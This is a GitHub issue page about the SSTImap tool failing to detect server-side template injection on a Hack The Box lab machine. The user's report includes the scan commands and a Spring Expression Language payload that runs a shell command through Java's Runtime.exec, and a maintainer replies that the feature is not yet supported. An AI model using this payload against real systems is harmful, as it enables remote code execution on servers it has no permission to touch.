We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
https://app.hackthebox.com/machines/481
python sstimap.py -u 'http://10.10.11.170:8080/search?name=test'
This box is vulnerable to Spring Boot e.g. *{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
Also fails in post mode python sstimap.py -m POST -u 'http://10.10.11.170:8080/search?name=test'
The text was updated successfully, but these errors were encountered:
SSTImap currently does not support Spring Boot templates. I will work on adding them in the future.
Sorry, something went wrong.
No branches or pull requests
https://app.hackthebox.com/machines/481
python sstimap.py -u 'http://10.10.11.170:8080/search?name=test'
This box is vulnerable to Spring Boot e.g.
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
Also fails in post mode
python sstimap.py -m POST -u 'http://10.10.11.170:8080/search?name=test'
The text was updated successfully, but these errors were encountered: